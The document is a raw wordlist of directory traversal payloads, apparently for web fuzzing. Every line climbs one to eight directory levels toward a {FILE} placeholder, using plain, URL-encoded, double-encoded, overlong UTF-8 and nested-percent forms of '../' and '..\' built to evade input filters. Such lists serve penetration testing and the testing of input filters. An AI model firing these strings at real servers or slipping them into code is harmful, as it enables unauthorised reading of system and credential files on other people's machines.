%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
